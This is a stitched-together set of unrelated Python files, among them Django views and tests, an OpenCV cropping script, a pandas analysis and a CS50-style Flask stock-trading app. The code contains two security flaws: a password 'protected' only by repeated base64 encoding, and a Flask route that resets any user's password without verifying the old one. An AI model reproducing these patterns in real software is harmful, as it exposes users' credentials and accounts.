        """Read pwd.txt and return (name, password), reversing the
        obfuscation applied by saveUserInfo (decode the password the same
        number of extra times the writer encoded it)."""
        try:
            f = open(os.path.expanduser('~') + "/.CowNewsReader/pwd.txt", 'r')
        except IOError, e:
            print e
            sys.exit(0)
        nro = base64.b64decode(f.readline().strip("\n"))
        pso = base64.b64decode(f.readline().strip("\n"))
        # Mirror of saveUserInfo: int(nro)%10 equals the writer's extra
        # encoding count, so the round trip is symmetric.
        for i in xrange(int(nro)%10):
            pso = base64.b64decode(pso)
        # Re-attach the leading character stripped by saveUserInfo.
        return ('e'+nro,pso)
|
12,481 | 5de4f225fd7a5254dd076ea2021ca1f0053c5ade | from django.http import Http404
from django.shortcuts import render, get_object_or_404, redirect
from .models import Product
from .forms import ProductCreateForm, RawProductForm
# Create your views here.
# def product_create_view(request):
# if request.method == 'POST':
# my_form = RawProductForm(request.POST)
# if my_form.is_valid():
# # now the data is good
# print(my_form.cleaned_data)
# Product.objects.create(**my_form.cleaned_data)
# else:
# print(my_form.errors)
# else:
# my_form = RawProductForm()
# context = {
# 'form': my_form
# }
# return render(request, 'products/create.html', context)
# def render_initial_data(request):
# initial_data = {
# 'title': 'Initial Title',
# 'price': 2.5,
# 'mrp': 3,
# 'featured': True
# }
# form = RawProductForm(request.POST or None, initial=initial_data)
# context = {
# 'form': form
# }
# return render(request, '', context)
# def render_database_data(request):
# product = Product.objects.get(id=3)
# form = RawProductForm(request.POST or None, instance=product)
# if form.is_valid():
# form.save() # We are able to use this method because form is instance of database object
# context = {
# 'form': form
# }
# return render(request, '', context)
# def handling_object_404(request, my_id):
# # 1st way
# obj = get_object_or_404(Product, id=id)
# # 2nd way
# try:
# obj = Product.objects.get(id=my_id)
# except Product.DoesNotExist:
# raise Http404
# context = {
# 'object': obj
# }
# return render(request, '', context)
# def product_delete_view(request, my_id):
# '''
# # view to confirm delete i.e. if this given form is submitted then we delete object
# <form action='.' method='POST'>
# <h1>Do you want to delete the product "{{ object.title }}"?</h1>
# <p>
# <input type='submit' value='Yes' />
# <a href='../'>Cancel</a>
# </p>
# </form>
# '''
# obj = get_object_or_404(Product, id=my_id)
# if request.method == 'POST':
# # confirming delete
# obj.delete()
# return redirect('../')
# context = {
# 'object': obj
# }
# return redirect(request, '', context)
def product_create_view(request):
    """Render the product-creation form; on a valid POST, persist the new
    product and present a fresh empty form."""
    form = ProductCreateForm(request.POST or None)
    if form.is_valid():
        form.save()
        # Reset so the page doesn't re-show the just-submitted values.
        form = ProductCreateForm()
    return render(request, 'products/create.html', {'form': form})
def product_detail_view(request):
    """Render the detail page for product 1.

    Uses get_object_or_404 (already imported at the top of this module) so a
    missing row yields an HTTP 404 instead of an unhandled
    Product.DoesNotExist (server error 500).
    """
    # NOTE: the product id is hard-coded; taking it from the URLconf would
    # require a signature change, so it is left as-is.
    product = get_object_or_404(Product, id=1)
    context = {
        'object': product
    }
    return render(request, 'products/detail.html', context)
|
12,482 | f2f251fda5d9222cc21d8ce34ca045d0af609394 | #based on https://medium.com/bilesanmiahmad/how-to-upload-a-file-to-amazon-s3-in-python-68757a1867c6
#https://stackoverflow.com/questions/8637153/how-to-return-images-in-flask-response
#https://stackoverflow.com/questions/18908426/increasing-client-max-body-size-in-nginx-conf-on-aws-elastic-beanstalk
#https://medium.com/@marilu597/getting-to-know-and-love-aws-elastic-beanstalk-configuration-files-ebextensions-9a4502a26e3c
#https://stackoverflow.com/questions/40336918/how-to-write-a-file-or-data-to-an-s3-object-using-boto3
#https://towardsdatascience.com/object-detection-with-less-than-10-lines-of-code-using-python-2d28eebc5b11
import cv2
import cvlib as cv
from cvlib.object_detection import draw_bbox
def determine(eachObject, centerx, centery):
    """Return True iff the point (centerx, centery) lies inside the box
    (x1, y1, x2, y2), where (x1, y1) is the lower-left corner and (x2, y2)
    the upper-right corner; boundary points count as inside."""
    x1, y1, x2, y2 = eachObject[0], eachObject[1], eachObject[2], eachObject[3]
    return x1 <= centerx <= x2 and y1 <= centery <= y2
# Detect common objects in input.jpg and, if any detected box contains the
# image centre, crop the first such box to output.jpg.
im = cv2.imread("input.jpg")
h, w, c = im.shape
centerx = w/2
centery = h/2
# bbox: list of [x1, y1, x2, y2] boxes; label/conf are unused here.
bbox, label, conf = cv.detect_common_objects(im)
# Keep only boxes that contain the image centre point.
finallist = [x for x in bbox if determine(x,centerx,centery)]
if (len(finallist) > 0):
    # Crop the first matching box (numpy slicing is rows=y, cols=x).
    left = finallist[0][0]
    top = finallist[0][1]
    right = finallist[0][2]
    bottom = finallist[0][3]
    im1 = im[top:bottom, left:right]
    cv2.imwrite("output.jpg",im1)
|
12,483 | 604f7fa74876aa8cab6fcfe1aa8d481974381b56 | #薪水和学历的关系图
import pandas as pd
import numpy as np
# Relationship between salary and education level: load the scraped job
# data (GBK-encoded CSV) and pivot mean salary by education.
df = pd.DataFrame(pd.read_csv("../../data/data.csv",encoding='gbk'))
'''
去掉异常值数据
'''
# Drop outlier rows: internship-duration values ("3/4/6 months") and a
# vocational-school level that leaked into the education column, plus
# day-rate salaries that don't fit the "NK" monthly format.
df = df[df['education'] != '3个月']
df = df[df['education'] != '4个月']
df = df[df['education'] != '6个月']
df = df[df['education'] != '中专/中技']
df = df[df['lowSalary'] != '200/天']
df = df[df['lowSalary'] != '300/天']
df = df[df['lowSalary'] != '160/天']
'''
通过对数据的处理,获取到每个职位的平均薪水
'''
# Average salary per posting: highSalary is presumably already numeric (in
# K) while lowSalary is a string like "5K" -- TODO confirm against the
# scraper's output schema.
salary = []
for x,y in zip(df['highSalary'],df['lowSalary']):
    salary.append((x + int(y[0:y.index('K')]))/2)
# Attach the computed average as a new 'salary' column.
df['salary'] = salary
print(pd.pivot_table(df,values=['salary'],columns=['education'],aggfunc=[np.mean]).unstack())
12,484 | cabba2cde718fc81e2c3df92c45869f585b6c7a9 | import scannerpy
import scannertools as st
import os
from django.db.models import Q
from query.models import Video, Frame, Face, Labeler, Tag, VideoTag
from esper.prelude import Notifier
import json
from tqdm import tqdm
# Faces were computed at this many FPS
FACE_FPS = 2
def frames_to_detect_faces(microshot_boundaries, video):
    """Return the sorted frame indices at which faces should be detected:
    a FACE_FPS-per-second sample of the whole video, plus every microshot
    boundary and the frame immediately before each boundary."""
    # Regular sampling grid at FACE_FPS detections per second.
    step = int(round(video.fps) / FACE_FPS)
    wanted = set(range(0, video.num_frames, step))
    # Add each boundary frame and its predecessor (when one exists).
    wanted |= set(microshot_boundaries)
    wanted |= {boundary - 1 for boundary in microshot_boundaries if boundary > 0}
    return sorted(wanted)
# Tag used to mark frames processed by this face pipeline.
TAG, _ = Tag.objects.get_or_create(name="face_computed")

# Get all the videos that haven't been labeled with this pipeline.
# NOTE(review): ids_to_exclude are presumably videos that previously failed
# processing -- confirm why these specific ids are skipped.
ids_to_exclude = set([36, 122, 205, 243, 304, 336, 455, 456, 503])
all_videos = set([video.id for video in Video.objects.all()])
video_ids=sorted(list(all_videos.difference(ids_to_exclude)))
print(video_ids, len(video_ids))
videos = Video.objects.filter(id__in=video_ids).order_by('id').all()

# Connection to the Scanner processing service.
db = scannerpy.Database()

print("Loading histograms from Scanner")
# Make sure the histograms have been computed already!
hsv_histograms = st.histograms.compute_hsv_histograms(
    db,
    videos=[video.for_scannertools() for video in list(videos)]
)

# Report videos whose histograms are missing.
for idx, hist in enumerate(hsv_histograms):
    if hist is None:
        print(videos[idx].id, 'is None')

#hsv_histograms_loaded = [hist.load() for hist in tqdm(hsv_histograms)]

print("Loading microshot boundaries")
# Compute microshot boundaries from the HSV histograms.
microshot_boundaries = st.shot_detection.compute_shot_boundaries(
    db,
    videos=[video.for_scannertools() for video in list(videos)],
    histograms=hsv_histograms
)
# Collect the ids of videos for which boundary detection produced nothing.
bad_boundaries = []
for idx, boundaries in enumerate(microshot_boundaries):
    # Bug fix: the original test `boundaries is []` was always False --
    # `is` compares identity and `[]` builds a brand-new list, so empty
    # boundary lists were never reported. Truthiness catches both None
    # and an empty sequence.
    if not boundaries:
        bad_boundaries.append(videos[idx].id)
print("{} movies fail on boundary detection".format(bad_boundaries))
print("Computing frames to compute on")
# Compute frames FACE_FPS times a second and before and after every microshot
# boundary
frames = [
frames_to_detect_faces(list(boundaries), video)
for boundaries, video in zip(microshot_boundaries, videos)
]
print("Saving frames to database")
frames_in_db_already = set([
(f.video_id, f.number)
for f in Frame.objects.filter(tags=TAG).all()
])
# Put frame objects in database
new_frames = []
for video, framelist in tqdm(zip(videos, frames), total=len(videos)):
frames_existing = set([f.number for f in Frame.objects.filter(video_id=video.id)])
new_frames += [
Frame(video=video, number=num)
for num in framelist
if num not in frames_existing
]
Frame.objects.bulk_create(new_frames)
print("Saving frame tags to database")
# Tag all the frames as being labeled
new_frame_tags = []
for video, framelist in tqdm(zip(videos, frames), total=len(videos)):
frame_objs = Frame.objects.filter(video_id=video.id).filter(number__in=framelist)
frame_obj_nums = set([f.number for f in frame_objs])
if frame_objs.count() != len(framelist):
print('Not all frames in Database for video {}'.format(video.id))
print('{} frames in DB, {} frames wanted'.format(len(frame_obj_nums), len(framelist)))
for frame in frame_objs:
new_frame_tags.append(
Frame.tags.through(frame_id=frame.pk, tag_id=TAG.pk))
Frame.tags.through.objects.bulk_create(new_frame_tags, batch_size=100000)
|
12,485 | 008bdb99b6415b4c3270cf94d5e15e1a0ccbd3a0 | import os
from cs50 import SQL
from flask import Flask, flash, jsonify, redirect, render_template, request, session
from flask_session import Session
from tempfile import mkdtemp
from werkzeug.exceptions import default_exceptions, HTTPException, InternalServerError
from werkzeug.security import check_password_hash, generate_password_hash
from datetime import datetime
from pytz import timezone
from helpers import apology, login_required, lookup, usd
# Configure application
app = Flask(__name__)

# Ensure templates are auto-reloaded (development convenience: Jinja picks
# up template edits without restarting the server).
app.config["TEMPLATES_AUTO_RELOAD"] = True
# Ensure responses aren't cached
@app.after_request
def after_request(response):
    """Stamp every response with no-cache headers so browsers always
    re-fetch (prevents stale portfolio data after a transaction)."""
    for header, value in (
        ("Cache-Control", "no-cache, no-store, must-revalidate"),
        ("Expires", 0),
        ("Pragma", "no-cache"),
    ):
        response.headers[header] = value
    return response
# Custom Jinja filter: format numbers as US dollars in templates.
app.jinja_env.filters["usd"] = usd

# Configure session to use filesystem (instead of signed cookies);
# session files live in a throwaway temp directory per process.
app.config["SESSION_FILE_DIR"] = mkdtemp()
app.config["SESSION_PERMANENT"] = False
app.config["SESSION_TYPE"] = "filesystem"
Session(app)

# Configure CS50 Library to use SQLite database
db = SQL("sqlite:///finance.db")
@app.route("/")
@login_required
def index():
    """Show portfolio of stocks.

    Renders one row per holding with its live quote plus the user's
    remaining cash balance.
    """
    # This route only accepts GET (Flask's default), so the guard always holds.
    if request.method == "GET":
        # Holdings summary per symbol for the logged-in user.
        portf = db.execute("SELECT name, symbol, price, sharesTotal, costmoneyTotal FROM total WHERE userID = :userID", userID=session["user_id"])
        porLen = len(portf)
        # Annotate each holding with the live quote; iterate the rows directly
        # instead of indexing by position (idiomatic, same behavior).
        for row in portf:
            # NOTE(review): lookup() returns None on API failure, which would
            # raise AttributeError here — confirm upstream availability.
            row['nowPrice'] = lookup(row["symbol"]).get("price")
            row['costmoneyTotal'] = usd(row['costmoneyTotal'])
        # Newest holdings first.
        portf.reverse()
        # Remaining cash balance, formatted as dollars.
        endPrice = db.execute("SELECT cash FROM users WHERE id = :userID", userID=session["user_id"])
        endPrice = usd(endPrice[0]["cash"])
        return render_template("index.html", portf=portf, endPrice=endPrice, porLen=porLen)
@app.route("/buy", methods=["GET", "POST"])
@login_required
def buy():
    """Buy shares of stock: validate input, charge cash, record the trade."""
    # User reached route via GET (as by clicking a link or via redirect)
    if request.method == "GET":
        return render_template("buy.html")
    else:
        symbol = request.form.get("symbol")
        if not symbol:
            return apology("must provide symbol", 400)
        # Check that the symbol exists via lookup(symbol)
        symbol = lookup(symbol)
        if not symbol :
            return apology("symbol doesn't exist,sorry", 400)
        else:
            name = symbol.get("name")
            price = symbol.get("price")
            symbol = symbol.get("symbol")
            # Check that the requested share count is made of digits only
            shares = request.form.get("shares")
            # https://www.geeksforgeeks.org/program-check-input-integer-string/
            # NOTE(review): an empty "shares" string passes this loop and then
            # int('') raises ValueError — confirm the form enforces non-empty input.
            n = len(shares)
            for i in range(n) :
                if shares[i].isdigit() != True :
                    return apology("shares need to be a number", 400)
            shares = int(shares)
            # if positive number
            if shares > 0:
                # Query database for user's cash
                cash = db.execute("SELECT cash FROM users WHERE id = :userID",
                                  userID=session["user_id"])
                # Get cash
                cash = cash[0]["cash"]
                # Check user has enough money
                buyNeed = shares*price
                # NOTE(review): '>' rejects a purchase that costs exactly the
                # user's cash balance — '>=' is probably intended; confirm.
                if cash > buyNeed:
                    # Deduct the purchase price from the user's cash
                    db.execute("UPDATE users SET cash = :cash WHERE id = :userID", cash=cash-buyNeed, userID=session["user_id"])
                    # Record purchase time (Asia/Shanghai local time)
                    now = datetime.now(timezone('Asia/Shanghai'))
                    # Add to buy table
                    db.execute("INSERT INTO buy (date, symbol, name, price, shares, costmoney, userID) VALUES (:date, :symbol, :name, :price, :shares, :costmoney, :userID)",
                               date=now, symbol=symbol, name=name, price=price, shares=shares, costmoney=buyNeed, userID=session["user_id"])
                    # Add to buy-sell (transaction history) table
                    db.execute("INSERT INTO bs (symbol, price, shares, date, userID) VALUES (:symbol, :price, :shares, :date, :userID)", symbol=symbol, price=usd(price), shares=shares, date=now, userID=session["user_id"])
                    # Remaining cash after the purchase
                    endCash=cash-buyNeed
                    # Recompute this holding's totals from the buy history.
                    # NOTE(review): these Python-side sums could be one
                    # "SELECT SUM(...)" query each; kept as-is.
                    sharesTotal = db.execute("SELECT shares FROM buy WHERE userID = :userID and name = :name", userID=session["user_id"], name=name)
                    costmoneyTotal = db.execute("SELECT costmoney FROM buy WHERE userID = :userID and name = :name", userID=session["user_id"], name=name)
                    # len(sharesTotal)
                    st = len(sharesTotal)
                    # Sum shares bought
                    sumItem = 0
                    for item in range(st):
                        sumItem = sharesTotal[item]["shares"] + sumItem
                    sharesTotal_2 = sumItem
                    # Sum money spent buying
                    sumItem2 = 0
                    for item2 in range(st):
                        sumItem2 = costmoneyTotal[item2]["costmoney"] + sumItem2
                    costmoneyTotal_2 = sumItem2
                    # Subtract anything already sold of this holding
                    sharesTotalSell = db.execute("SELECT shares FROM sell WHERE userID = :userID and name = :name", userID=session["user_id"], name=name)
                    costmoneyTotalSell = db.execute("SELECT totalGet FROM sell WHERE userID = :userID and name = :name", userID=session["user_id"], name=name)
                    # Len of sharesTotalSell
                    stS = len(sharesTotalSell)
                    # Sum of sold shares
                    sumItem3 = 0
                    for item3 in range(stS):
                        sumItem3 = sharesTotalSell[item3]["shares"] + sumItem3
                    # Net shares = bought - sold
                    sharesTotal_2 = sharesTotal_2-sumItem3
                    # Sum of sale proceeds
                    sumItem4 = 0
                    for item4 in range(stS):
                        sumItem4= costmoneyTotalSell[item4]["totalGet"] + sumItem4
                    # Net cost = spent - proceeds
                    costmoneyTotal_2 = costmoneyTotal_2-sumItem4
                    # Does a totals row for this holding already exist?
                    total = db.execute("SELECT sharesTotal FROM total WHERE userID = :userID and name = :name", userID=session["user_id"], name=name)
                    # Insert total TABLE
                    if not total:
                        db.execute("INSERT INTO total (name, symbol, price, sharesTotal, costmoneyTotal, userID) VALUES (:name, :symbol, :price, :sharesTotal, :costmoneyTotal, :userID)",
                                   name=name, symbol=symbol, price=price, sharesTotal=sharesTotal_2, costmoneyTotal=costmoneyTotal_2, userID=session["user_id"])
                    # Update total TABLE
                    else:
                        db.execute("UPDATE total SET sharesTotal = :sharesTotal, costmoneyTotal = :costmoneyTotal WHERE userID = :userID and name = :name", sharesTotal=sharesTotal_2, costmoneyTotal=costmoneyTotal_2, userID=session["user_id"], name=name)
                    # Re-read the full portfolio for rendering
                    total = db.execute("SELECT * FROM total WHERE userID = :userID", userID=session["user_id"])
                    # Len of total
                    tlen = len(total)
                    # Get user cash
                    cash = db.execute("SELECT cash FROM users WHERE id = :userID",
                                      userID=session["user_id"])
                    cash = usd(cash[0]["cash"])
                    # Format money columns for display
                    for n in range(tlen):
                        total[n]["price"] = usd(total[n]["price"])
                        total[n]["costmoneyTotal"] = usd(total[n]["costmoneyTotal"])
                    total = list(reversed(total))
                    # Flash
                    flash("buy")
                    return render_template("buyed.html", total=total, tlen=tlen, cash=cash)
                else:
                    # Else cash not enough
                    return apology("cash not enough", 400)
            else:
                # Else not a positive number
                return apology("not positive number", 400)
@app.route("/check", methods=["GET"])
def check():
    """Return true if username available, else false, in JSON format"""
    username = request.args.get("username")
    # A missing/empty username can never be registered.
    if not username:
        return jsonify(False)
    # Available exactly when no existing row matches the name.
    matches = db.execute("SELECT * FROM users WHERE username = :username",
                         username=username)
    return jsonify(not matches)
@app.route("/history")
@login_required
def history():
    """Show history of transactions"""
    # Route only accepts GET, so this guard always holds.
    if request.method == "GET":
        # Full buy/sell ledger for this user, in insertion order.
        ledger = db.execute("SELECT * FROM bs WHERE userID=:userID", userID=session["user_id"])
        flash('history')
        return render_template("history.html", bs=ledger, bslen=len(ledger))
@app.route("/password", methods=["GET", "POST"])
def password():
    """Change a user's password given a username and a confirmed new password.

    SECURITY NOTE(review): this route is unauthenticated and never verifies the
    OLD password — anyone who knows a username can take over the account.
    Confirm whether an identity check was intended here.
    """
    # Forget any user_id
    session.clear()
    # User reached route via POST (as by submitting a form via POST)
    if request.method == "POST":
        # Ensure username was submitted
        if not request.form.get("username"):
            return apology("must provide username1", 403)
        # Ensure password was submitted
        elif not request.form.get("password"):
            return apology("must provide password", 403)
        # Ensure password was confirmed
        elif request.form.get("password") != request.form.get("confirmation"):
            return apology("must provide confirmation password", 403)
        # Query database for username
        rows = db.execute("SELECT * FROM users WHERE username = :username",
                          username=request.form.get("username"))
        # Ensure username exists
        if len(rows) != 1:
            return apology("invalid username", 403)
        else:
            # Get password from form
            password = request.form.get("password")
            # Hash password through hash function
            hash0 = generate_password_hash(password)
            # Store the new hash
            db.execute("UPDATE users SET hash = :hash1 WHERE username = :username", hash1=hash0, username=request.form.get("username"))
            # Remember which user has logged in
            session["user_id"] = rows[0]["id"]
            # Flash message
            flash('password change')
            # Redirect user to home page
            return redirect("/")
    # User reached route via GET (as by clicking a link or via redirect)
    else:
        return render_template("password.html")
@app.route("/login", methods=["GET", "POST"])
def login():
    """Log user in"""
    # Drop any stale session before authenticating.
    session.clear()
    # GET: just show the login form.
    if request.method != "POST":
        return render_template("login.html")
    username = request.form.get("username")
    password = request.form.get("password")
    # Both credentials are required.
    if not username:
        return apology("must provide username1", 403)
    if not password:
        return apology("must provide password", 403)
    # Fetch the account row and verify the password hash.
    rows = db.execute("SELECT * FROM users WHERE username = :username",
                      username=username)
    if len(rows) != 1 or not check_password_hash(rows[0]["hash"], password):
        return apology("invalid username and/or password", 403)
    # Success: remember the user and go home.
    session["user_id"] = rows[0]["id"]
    flash('login')
    return redirect("/")
@app.route("/logout")
def logout():
    """Log user out"""
    # Clearing the session forgets the user id.
    session.clear()
    flash('logout')
    return redirect("/")
@app.route("/quote", methods=["GET", "POST"])
@login_required
def quote():
    """Get stock quote."""
    if request.method == "GET":
        return render_template("quote.html")
    # POST: validate and look up the requested symbol.
    raw_symbol = request.form.get("symbol")
    if not raw_symbol:
        return apology("must provide symbol", 400)
    quote_data = lookup(raw_symbol)
    if not quote_data:
        return apology("must provide right symbol", 400)
    return render_template("quoted.html", name=quote_data.get("name"), symbol=quote_data.get("symbol"), price=usd(quote_data.get("price")))
@app.route("/register", methods=["GET", "POST"])
def register():
    """Register user"""
    # GET: show the registration form.
    if request.method != "POST":
        return render_template("register.html")
    username = request.form.get("username")
    password = request.form.get("password")
    # Validate the submitted form.
    if not username:
        return apology("must provide username", 400)
    if not password:
        return apology("must provide password", 400)
    if password != request.form.get("confirmation"):
        return apology("must provide same password", 400)
    # Refuse duplicate usernames.
    existing = db.execute("SELECT * FROM users WHERE username = :username",
                          username=username)
    if existing:
        return apology("username can't be the same", 400)
    # Store only the salted hash of the password.
    db.execute("INSERT INTO users (username,hash) VALUES (:username,:hash1)",
               username=username, hash1=generate_password_hash(password))
    # Re-read the row to learn the new user's id, then log them in.
    created = db.execute("SELECT * FROM users WHERE username = :username",
                         username=username)
    session["user_id"] = created[0]["id"]
    flash('register!')
    return redirect("/")
@app.route("/sell", methods=["GET", "POST"])
@login_required
def sell():
    """Sell shares of stock: validate holdings, credit cash, record the trade."""
    # User reached route via GET (as by submitting a form via GET)
    if request.method == "GET":
        # Symbols this user currently holds, for the dropdown
        symbol_sel = db.execute("SELECT symbol FROM total WHERE userID = :userID", userID=session["user_id"])
        return render_template("sell.html", symbol_sel=symbol_sel, sslen=len(symbol_sel) )
    else:
        # Get symbol and number through input form
        symbol = request.form.get("symbol")
        number = request.form.get("shares")
        # Ensure sell symbol was submitted
        if not symbol:
            return apology("must provide symbol", 400)
        # Ensure sell number was submitted
        if not number:
            return apology("must provide number", 400)
        # Check if request.form.get("symbol") is known to lookup()
        symbol = lookup(symbol)
        if not symbol:
            return apology("must provide right symbol", 400)
        else:
            # Get name, price, symbol from lookup function
            name = symbol.get("name")
            price = symbol.get("price")
            symbol = symbol.get("symbol")
            # SELECT symbol in TABLE total
            symbolIn = db.execute("SELECT symbol FROM total WHERE userID = :userID and symbol = :symbol",
                                  userID=session["user_id"], symbol=symbol)
            # Ensure the user actually holds this symbol
            if not symbolIn:
                return apology("you don't have this symbol", 400)
            # Ensure sell number is made of digits only
            nlen = len(number)
            for i in range(nlen) :
                if number[i].isdigit() != True :
                    return apology("sell number need to be a number", 400)
            number = int(number)
            # Check positive number
            if number > 0:
                # SELECT sharesTotal in TABLE total
                symbolNum = db.execute("SELECT sharesTotal FROM total WHERE userID = :userID and symbol = :symbol",
                                       userID=session["user_id"], symbol=symbol)
                # Refuse to sell more shares than are held
                if symbolNum[0]["sharesTotal"] < number:
                    return apology("you don't have this number", 400)
                # Select cash from users TABLE
                cash = db.execute("SELECT cash FROM users WHERE id = :userID",
                                  userID=session["user_id"])
                # Credit the sale proceeds to the cash balance
                totalGet = price*number
                cash = cash[0]["cash"] + totalGet
                # Update cash in users
                db.execute("UPDATE users SET cash = :cash WHERE id = :userID", cash=cash, userID=session["user_id"])
                # Record sale time (Asia/Shanghai local time)
                now = datetime.now(timezone('Asia/Shanghai'))
                # INSERT sell TABLE date, shares, price, name, symbol, totalGet
                db.execute("INSERT INTO sell (date, symbol, name, price, shares, totalGet, userID) VALUES (:date, :symbol, :name, :price, :shares, :totalGet, :userID)",date=now, symbol=symbol, name=name, price=price, shares=number, totalGet=totalGet, userID=session["user_id"])
                # Add to buy-sell table (negative share count marks a sale)
                db.execute("INSERT INTO bs (symbol, price, shares, date, userID) VALUES (:symbol, :price, :shares, :date, :userID)", symbol=symbol, price=usd(price), shares=-number, date=now, userID=session["user_id"])
                # SELECT costmoneyTotal FROM total
                costTot = db.execute("SELECT costmoneyTotal FROM total WHERE userID = :userID and name = :name",
                                     userID=session["user_id"], name = name)
                # NOTE(review): subtracting sale proceeds from the cost basis can
                # drive costmoneyTotal negative — confirm this bookkeeping is intended.
                costTotEnd = costTot[0]["costmoneyTotal"]-totalGet
                # Update sharesTotal, costmoneyTotal in total
                db.execute("UPDATE total SET sharesTotal = :sharesTotal, costmoneyTotal = :costmoneyTotal WHERE userID = :userID and name = :name", sharesTotal=symbolNum[0]["sharesTotal"]-number, costmoneyTotal=costTotEnd, userID=session["user_id"], name=name)
                # Flash message
                flash('sell')
                # NOTE(review): the template argument named costTotEnd is passed
                # usd(cash), not costTotEnd — verify which value the page should show.
                return render_template("selled.html",symbol=symbol, name=name, price=price, number=symbolNum[0]["sharesTotal"]-number, totalGet=usd(totalGet), costTotEnd=usd(cash))
            else:
                return apology("positive number", 400)
def errorhandler(e):
    """Render an apology page for any raised error."""
    # Anything that isn't already an HTTP error is treated as a 500.
    e = e if isinstance(e, HTTPException) else InternalServerError()
    return apology(e.name, e.code)
# Listen for errors: route every standard HTTP error code through errorhandler
for code in default_exceptions:
    app.errorhandler(code)(errorhandler)
|
12,486 | 271812b8726ba3ec4d0b262bf91946fe6c20c9c1 | # -*- coding: utf-8 -*-
"""
Created on Mon Nov 6 18:42:31 2017
@author: Ryan Lott
Game rules:
Objective: Connect both keyboard sides with a single word
All letters in the word must form a single chain
"""
import time
import os
from graph_func import Graph
# Start timer
start_time = time.time()
# Load the word list from words.txt next to the current working directory.
# NOTE(review): the backslash separator and the unclosed file handle are
# Windows-specific / leaky — confirm target platform before changing.
a = os.getcwd()
a= open(a+'\\words.txt','r').read()
words = a.lower().split("\n")
# Adjacency graph of physically neighbouring keys on a QWERTY keyboard
graph = { "a" : ["q",'w','s','z'],
          "b" : ["v", "g",'h','n'],
          "c" : ["x", "d", "f", "v"],
          "d" : ["s", "e", "r", "f",'c','x'],
          "e" : ["w", "s", "d", "r"],
          "f" : ["d", "r", "t", "g",'v','c'],
          "g" : ["f", "t", "y", "h",'b','v'],
          "h" : ["g", "y", "u", "j",'n','b'],
          "i" : ["u", "j", "k", "o"],
          "j" : ["h", "u", "i", "k",'m','n'],
          "k" : ["j", "i", "o", "l",'m'],
          "l" : ["k", "o", "p"],
          "m" : ["n", "j", "k"],
          "n" : ["b", "h", "j", "m"],
          "o" : ["i", "k", "l", "p"],
          "p" : ["o", "l"],
          "q" : ["w", "a"],
          "r" : ["e", "d", "f", "t"],
          "s" : ["a", "w", "e", "d",'x','z'],
          "t" : ["r", "f", "g", "y"],
          "u" : ["y", "h", "j", "i"],
          "v" : ["c", "f", "g", "b"],
          "w" : ["q", "a", "s", "e"],
          "x" : ["z", "s", "d", "c"],
          "y" : ["t", "g", "h", "u"],
          "z" : ["a", "s", "x"] }
# Stores all words that cross the keyboard for outputting
successes = []
# Edge connections (left-column key to right-column key) that imply success
attempts = ['qp','ap','zp','ql','al','zl','qm','am','zm']
# Loop all words in the 466k-word dictionary and test against parameters
for word in words:
    if len(word) > 6: # Impossible to cross in 6, fastest method to eliminate
        # Limit graph to only have access to connections for letters in word
        dicts = {}
        letters = [letter for letter in word]
        for letter in letters:
            # Try/Except to handle special characters
            # NOTE(review): bare except also hides real bugs — consider KeyError.
            try:
                matches = [match for match in graph[letter] if match in letters]
                dicts[letter] = matches
            except: pass
        if not any(dicts[key] == [] for key in dicts.keys()): # Error handling
            # Create graph restricted to this word's letters
            g = Graph(dicts)
            links = []
            for key in dicts.keys():
                for key1 in dicts.keys():
                    links.append([key,key1])
            # Test for a single contiguous chain of letters
            if not any(str(g.find_path(link[0],link[1]))=="None" for link in links):
                # Test if a letter combination that crosses the keyboard exists
                for attempt in attempts:
                    if g.find_path(attempt[0],attempt[1]):
                        print(attempt," success: ", word)
                        successes.append(word+": "+attempt)
# Takes roughly 6.5s
end_time = time.time() - start_time
print("Time to complete: ",end_time) |
12,487 | 0ca56fdc2734c15b965708c268c1af9d86e4a6f5 | import re
from django.contrib.auth.models import User
from django.forms import ValidationError
from nose.tools import eq_
from pyquery import PyQuery as pq
from users.forms import (RegisterForm, EmailConfirmationForm, EmailChangeForm,
PasswordChangeForm, PasswordConfirmationForm)
from users.tests import TestCaseBase
class RegisterFormTestCase(TestCaseBase):
    # Placeholder: registration-form validation is not covered yet.
    pass #TODO
class EmailConfirmationFormTestCase(TestCaseBase):
    """Validation tests for EmailConfirmationForm."""
    fixtures = ['users.json']
    def setUp(self):
        self.user = User.objects.get(username='rrosario')
    def test_correct_email(self):
        # A well-formed address validates.
        form = EmailConfirmationForm(self.user, data={'email': 'user118577@nowhere.com'})
        assert form.is_valid()
    def test_invalid_email_address(self):
        # A malformed domain must be rejected.
        form = EmailConfirmationForm(self.user, data={'email': 'invalid@.email'})
        assert not form.is_valid()
class EmailChangeFormTestCase(TestCaseBase):
    """Validation tests for EmailChangeForm (requires current password)."""
    fixtures = ['users.json']
    def setUp(self):
        self.user = User.objects.get(username='rrosario')
    def test_wrong_password(self):
        # A wrong current password blocks the change.
        form = EmailChangeForm(self.user, data={'password': 'wrongpass',
                                                'new_email': 'new_email@example.com'})
        assert not form.is_valid()
    def test_invalid_email_address(self):
        # Even with the right password, a malformed address is rejected.
        form = EmailChangeForm(self.user, data={'password': 'testpass',
                                                'new_email': 'invalid@.email'})
        assert not form.is_valid()
class PasswordChangeFormTestCase(TestCaseBase):
    """Validation tests for PasswordChangeForm."""
    fixtures = ['users.json']
    def setUp(self):
        self.user = User.objects.get(username='rrosario')
    def test_wrong_password(self):
        # Wrong current password blocks the change.
        form = PasswordChangeForm(self.user, data={'password': 'wrongpass',
                                                   'new_password': 'newpassword',
                                                   'new_password2': 'newpassword'})
        assert not form.is_valid()
    def test_passwords_not_matching(self):
        # The two new-password fields must agree.
        form = PasswordChangeForm(self.user, data={'password': 'testpass',
                                                   'new_password': 'firstpass',
                                                   'new_password2': 'secondpass'})
        assert not form.is_valid()
    def test_valid_input(self):
        # Correct current password + matching new passwords succeed.
        form = PasswordChangeForm(self.user, data={'password': 'testpass',
                                                   'new_password': 'newpass',
                                                   'new_password2': 'newpass'})
        assert form.is_valid()
class PasswordConfirmationFormTestCase(TestCaseBase):
    """Validation tests for PasswordConfirmationForm."""
    fixtures = ['users.json']
    def setUp(self):
        self.user = User.objects.get(username='rrosario')
    def test_wrong_password(self):
        form = PasswordConfirmationForm(self.user, data={'password': 'wrongpass'})
        assert not form.is_valid()
    def test_correct_password(self):
        form = PasswordConfirmationForm(self.user, data={'password': 'testpass'})
        assert form.is_valid()
|
12,488 | d9d18d0802b699d81635236c227e8e356342abdf | import requests, bs4, time, csv
#### setup variables
f_writeout = 1 #binary flag to enable logging to local CSV file
sb_url = 'https://buseta.wmata.com/m/index?q=1003237' #test url, ft totten station bus stop
